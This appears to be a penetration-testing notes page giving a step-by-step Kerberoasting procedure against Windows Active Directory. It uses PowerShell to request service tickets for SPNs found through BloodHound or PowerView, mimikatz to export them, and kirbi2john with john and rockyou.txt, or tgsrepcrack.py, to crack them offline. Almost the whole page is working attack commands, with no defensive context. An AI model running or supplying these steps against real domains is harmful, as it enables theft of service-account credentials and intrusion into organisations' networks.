# using mimikatz

## using mimikatz

* Method 1

Type 1) & 2) in powershell or cmd , this will generate requested service ticket

1. Add-Type -AssemblyName System.IdentityModel
2. New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “\<SPN>” to get SPN, go to bloodhound>select service account>node info>spn Or with **PowerView**  with the command **`Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname`**
3. Run mimikatz.exe privilege::debug
4. kerberos::list /export , download service ticket
5. exit to exit mimikatz
6. dir to check output and select the desire file and transfer it on your linux machine (if netcat used then transfer it in binary)
7. kirbi2john \<file> >hash.txt
8. john hash.txt —wordlist=rockyou.txt

* Method 2

1. Follow till step **5** to export service ticket , then ./tgsrepcrack.py \<wordlist> <.kirbi file>